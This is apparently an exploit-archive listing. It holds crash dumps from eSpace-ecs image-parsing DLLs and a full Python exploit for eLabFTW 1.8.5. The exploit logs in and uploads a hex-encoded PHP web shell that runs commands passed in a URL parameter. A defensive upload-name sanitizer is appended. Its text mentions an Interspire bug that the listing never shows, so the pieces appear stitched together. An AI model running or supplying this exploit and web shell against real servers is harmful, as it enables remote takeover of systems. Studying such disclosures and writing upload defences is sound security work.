036de5b4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
036de5c4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
036de5d4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
036de5e4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

--

PNG Decoder error msg:$s
Invalid parameter passed to C runtime function.
Invalid parameter passed to C runtime function.
(1874.2274): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=015d8998 edx=00000000 esi=015d8ab8 edi=00000000
eip=025f1b99 esp=032ccc88 ebp=032cd0c4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
*** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\classmgr.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\classmgr.dll -
classmgr+0x11b99:
025f1b99 8b9868060000    mov     ebx,dword ptr [eax+668h] ds:0023:00000668=????????

--

JPEG datastream contains no image
Improper call to JPEG library in state 200
(1f88.2768): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=a2afcfb5 edx=00000000 esi=0352e318 edi=000000cc
eip=0491b035 esp=0352e2c8 ebp=0352ed30 iopl=0         nv up ei ng nz ac pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297
*** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\MiniGDIEx.DLL
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\MiniGDIEx.DLL -
MiniGDIEx!DllUnregisterServer+0x2f95:
0491b035 ff10            call    dword ptr [eax] ds:0023:00000000=????????

---

PoC files:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46867.zip
-
eLabFTW 1.8.5 - Arbitrary File Upload / Remote Code Execution
# Exploit Title : eLabFTW 1.8.5 'EntityController' Arbitrary File Upload / RCE
# Date : 5/18/19
# Exploit Author : liquidsky (JMcPeters)
# Vulnerable Software : eLabFTW 1.8.5
# Vendor Homepage : https://www.elabftw.net/
# Version : 1.8.5
# Software Link : https://github.com/elabftw/elabftw
# Tested On : Linux / PHP Version 7.0.33 / Default installation (Softaculous)
# Author Site : http://incidentsecurity.com | https://github.com/fuzzlove
#
# Greetz : wetw0rk, offsec ^^
#
# Description: eLabFTW 1.8.5 is vulnerable to arbitrary file uploads via the /app/controllers/EntityController.php component.
# This may result in remote command execution. An attacker can use a user account to fully compromise the system using a POST request.
# This will allow for PHP files to be written to the web root, and for code to execute on the remote server.
#
# Notes: Once this is done a php shell will drop at https://[targetsite]/[elabftw directory]/uploads/[random 2 alphanum]/[random long alphanumeric].php5?e=whoami
# You will have to visit the uploads directory on the site to see what the name is. However there is no protection against directory listing.
# So this can be done by an attacker remotely.

#!/usr/bin/env python

import requests
from bs4 import BeautifulSoup as bs4
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
import sys
import time

print "+-------------------------------------------------------------+"
print
print "- eLabFTW 1.8.5 'EntityController' Arbitrary File Upload / RCE"
print
print "- Discovery / PoC by liquidsky (JMcPeters) ^^"
print
print "+-------------------------------------------------------------+"

try:
    target = sys.argv[1]
    email = sys.argv[2]
    password = sys.argv[3]
    directory = sys.argv[4]
except IndexError:
    print "- Usage: %s <target> <email> <password> <directory>" % sys.argv[0]
    print "- Example: %s incidentsecurity.com [email protected] mypassword elabftw" % sys.argv[0]
    sys.exit()

proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}

# The payload to send (hex-escaped multipart body: upload=true, id=4, type=experiments, file=poc3.php5)
data = ""
data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x37"
data += "\x32\x31\x36\x37\x35\x39\x38\x31\x31\x30\x38\x37\x34\x35\x39"
data += "\x34\x31\x31\x31\x36\x33\x30\x33\x39\x35\x30\x37\x37\x0d\x0a"
data += "\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69"
data += "\x74\x69\x6f\x6e\x3a\x20\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61"
data += "\x3b\x20\x6e\x61\x6d\x65\x3d\x22\x75\x70\x6c\x6f\x61\x64\x22"
data += "\x0d\x0a\x0d\x0a\x74\x72\x75\x65\x0d\x0a\x2d\x2d\x2d\x2d\x2d"
data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x37\x32\x31\x36\x37\x35"
data += "\x39\x38\x31\x31\x30\x38\x37\x34\x35\x39\x34\x31\x31\x31\x36"
data += "\x33\x30\x33\x39\x35\x30\x37\x37\x0d\x0a\x43\x6f\x6e\x74\x65"
data += "\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a"
data += "\x20\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x20\x6e\x61\x6d"
data += "\x65\x3d\x22\x69\x64\x22\x0d\x0a\x0d\x0a\x34\x0d\x0a\x2d\x2d"
data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x37\x32\x31"
data += "\x36\x37\x35\x39\x38\x31\x31\x30\x38\x37\x34\x35\x39\x34\x31"
data += "\x31\x31\x36\x33\x30\x33\x39\x35\x30\x37\x37\x0d\x0a\x43\x6f"
data += "\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69"
data += "\x6f\x6e\x3a\x20\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x20"
data += "\x6e\x61\x6d\x65\x3d\x22\x74\x79\x70\x65\x22\x0d\x0a\x0d\x0a"
data += "\x65\x78\x70\x65\x72\x69\x6d\x65\x6e\x74\x73\x0d\x0a\x2d\x2d"
data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x37\x32\x31"
data += "\x36\x37\x35\x39\x38\x31\x31\x30\x38\x37\x34\x35\x39\x34\x31"
data += "\x31\x31\x36\x33\x30\x33\x39\x35\x30\x37\x37\x0d\x0a\x43\x6f"
data += "\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69"
data += "\x6f\x6e\x3a\x20\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x20"
data += "\x6e\x61\x6d\x65\x3d\x22\x66\x69\x6c\x65\x22\x3b\x20\x66\x69"
data += "\x6c\x65\x6e\x61\x6d\x65\x3d\x22\x70\x6f\x63\x33\x2e\x70\x68"
data += "\x70\x35\x22\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79"
data += "\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e"
data += "\x2f\x78\x2d\x70\x68\x70\x0d\x0a\x0d\x0a\x3c\x3f\x70\x68\x70"
data += "\x20\x65\x63\x68\x6f\x20\x73\x68\x65\x6c\x6c\x5f\x65\x78\x65"
data += "\x63\x28\x24\x5f\x47\x45\x54\x5b\x27\x65\x27\x5d\x2e\x27\x20"
data += "\x32\x3e\x26\x31\x27\x29\x3b\x20\x3f\x3e\x0d\x0a\x2d\x2d\x2d"
data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x37\x32\x31\x36"
data += "\x37\x35\x39\x38\x31\x31\x30\x38\x37\x34\x35\x39\x34\x31\x31"
data += "\x31\x36\x33\x30\x33\x39\x35\x30\x37\x37\x2d\x2d\x0d\x0a"

s = requests.Session()

print "[*] Visiting eLabFTW Site"
r = s.get('https://' + target + '/' + directory + '/login.php',verify=False)
print "[x]"

# Grabbing token
html_bytes = r.text
soup = bs4(html_bytes, 'lxml')
token = soup.find('input', {'name':'formkey'})['value']

values = {'email': email,
          'password': password,
          'formkey': token,}

time.sleep(2)
print "[*] Logging in to eLabFTW"
r = s.post('https://' + target + '/' + directory + '/app/controllers/LoginController.php', data=values, verify=False)
print "[x] Logged in :)"
time.sleep(2)

sessionId = s.cookies['PHPSESSID']

headers = {
    #POST /elabftw/app/controllers/EntityController.php HTTP/1.1
    #Host: incidentsecurity.com
    "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0",
    "Accept": "application/json",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    #Referer: https://incidentsecurity.com
    "Cache-Control": "no-cache",
    "X-Requested-With": "XMLHttpRequest",
    "Content-Length": "588",
    "Content-Type": "multipart/form-data; boundary=---------------------------72167598110874594111630395077",
    "Connection": "close",
    "Cookie": "PHPSESSID=" + sessionId + ";" + "token=" + token
}

print "[*] Sending payload..."
r = s.post('https://' + target + '/' + directory + '/app/controllers/EntityController.php',verify=False, headers=headers, data=data)
print "[x] Payload sent"
print
print "Now check https://%s/%s/uploads" % (target, directory)
print "Your php shell will be there under a random name (.php5)"
print
print "i.e https://[vulnerable site]/elabftw/uploads/60/6054a32461de6294843b7f7ea9ea2a34a19ca420752b087c87011144fc83f90b9aa5bdcdce5dee132584f6da45b7ec9e3841405e9d67a7d196f064116cf2da38.php5?e=whoami"
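Both upload bugs in this listing, the Interspire surveys_submit.php handler that moves the file under the client-supplied name and the eLabFTW EntityController that accepts a .php5 upload, share one missing control: a server-side naming policy. The following Python function is an added example, not code from either project; it strips client path components, rejects any server-executable suffix anywhere in the name (so poc3.php5 and shell.php.png both fail), checks the final extension against an allow-list (the list itself is an assumption for the example), and replaces the name with a server-generated one.

```python
"""Server-side upload naming policy that both uploads in this listing lack.

Added example, not code from Interspire or eLabFTW. The allow-list below is an
assumption; the executable-suffix set covers what common PHP/Apache setups hand to
an interpreter, including the .php5 extension the eLabFTW PoC relies on.
"""
import secrets

# Any of these anywhere in the suffix chain means the file could be executed server-side.
EXECUTABLE_SUFFIXES = {
    "php", "php3", "php4", "php5", "php7", "phps", "pht", "phtml", "phar",
    "cgi", "pl", "py", "asp", "aspx", "jsp", "htaccess", "htpasswd",
}
# File types the form is expected to receive (assumption for the example).
ALLOWED_SUFFIXES = {"pdf", "png", "jpg", "jpeg", "gif", "txt", "csv"}


class UploadRejected(ValueError):
    """Raised when a client-supplied file name fails the policy."""


def sanitize_upload_name(client_name, allowed=ALLOWED_SUFFIXES):
    """Return a server-generated file name for an acceptable upload, else raise.

    Only the (lower-cased) extension survives from the client name; the stored
    name is random so the client neither predicts nor chooses where the file lands.
    """
    # Drop any directory part the client sent, with either separator.
    base = client_name.replace("\\", "/").rsplit("/", 1)[-1].strip()
    if not base or "\x00" in base or base in {".", ".."}:
        raise UploadRejected("empty or malformed file name")
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        raise UploadRejected("file name must have a stem and an extension")
    suffixes = parts[1:]
    bad = [s for s in suffixes if s in EXECUTABLE_SUFFIXES]
    if bad:
        raise UploadRejected(f"executable suffix {bad[0]!r} in {base!r}")
    ext = suffixes[-1]
    if ext not in allowed:
        raise UploadRejected(f"extension {ext!r} is not allowed")
    return f"{secrets.token_hex(16)}.{ext}"


def is_acceptable(client_name):
    """Boolean view of the policy, convenient for logging and tests."""
    try:
        sanitize_upload_name(client_name)
        return True
    except UploadRejected:
        return False


if __name__ == "__main__":
    for name in ("report.pdf", "info.php", "poc3.php5", "shell.php.png", "../../x.png"):
        print(f"{name:15s} -> {'accepted' if is_acceptable(name) else 'rejected'}")
```

The name is only half of it: the Interspire files land under admin/temp and the eLabFTW files under a listable uploads/ directory, so the store should also sit outside the document root (or be served with script execution and directory listing disabled).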